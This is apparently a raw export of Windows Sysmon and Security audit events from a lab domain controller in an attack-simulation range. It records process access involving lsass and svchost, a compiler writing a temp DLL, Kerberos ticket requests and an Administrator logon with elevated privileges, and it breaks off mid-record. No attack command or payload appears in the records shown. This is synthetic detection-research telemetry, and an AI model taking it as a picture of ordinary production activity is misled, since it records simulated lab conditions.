{"EventTime":"2020-08-01 07:58:56","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4624,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:56.533\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:56.533","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:56","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4625,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:56.533\r\nSourceProcessGUID: {41C8662E-20BF-5F25-0000-001074C30600}\r\nSourceProcessId: 5076\r\nSourceThreadId: 4416\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-20C0-5F25-0000-00106DE70600}\r\nTargetProcessId: 2852\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:56.533","SourceProcessGUID":"{41C8662E-20BF-5F25-0000-001074C30600}","SourceProcessId":"5076","SourceThreadId":"4416","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-20C0-5F25-0000-00106DE70600}","TargetProcessId":"2852","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:56","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4626,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:58:56.533\r\nProcessGuid: {41C8662E-20C0-5F25-0000-0010DEE30600}\r\nProcessId: 4012\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\elpxvu02.dll\r\nCreationUtcTime: 2020-08-01 07:58:56.439","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:58:56.533","ProcessGuid":"{41C8662E-20C0-5F25-0000-0010DEE30600}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\elpxvu02.dll","CreationUtcTime":"2020-08-01 07:58:56.439","EventReceivedTime":"2020-08-01 07:58:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:56","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4627,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:56.564\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:56.564","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:56","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220515,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator\r\n\tSupplied Realm Name:\tATTACKRANGE\r\n\tUser ID:\t\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetSid":"S-1-5-21-2231640892-1842410504-3836505531-500","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-2231640892-1842410504-3836505531-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 07:58:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:56","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220516,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{7C4CDB36-E460-6EF3-D14D-1AB9DF00B302}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-6178966$\r\n\tService ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"Administrator@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-6178966$","ServiceSid":"S-1-5-21-2231640892-1842410504-3836505531-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{7C4CDB36-E460-6EF3-D14D-1AB9DF00B302}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 07:58:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:56","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220517,"ActivityID":"{C6A61085-67D8-0001-8610-A6C6D867D601}","ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{7C4CDB36-E460-6EF3-D14D-1AB9DF00B302}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x520\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{7C4CDB36-E460-6EF3-D14D-1AB9DF00B302}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 07:58:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:56","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220518,"ActivityID":"{C6A61085-67D8-0001-8610-A6C6D867D601}","ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x6E8FA\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{7C4CDB36-E460-6EF3-D14D-1AB9DF00B302}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x520\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-6178966\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x6e8fa","LogonType":"3","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-6178966","LogonGuid":"{7C4CDB36-E460-6EF3-D14D-1AB9DF00B302}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 07:58:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:56","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220519,"ActivityID":"{C6A61085-67D8-0001-8610-A6C6D867D601}","ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x6E8FA\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x6e8fa","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 07:58:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:56","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4628,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:56.564\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:56.564","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:56","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4629,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:56.564\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYST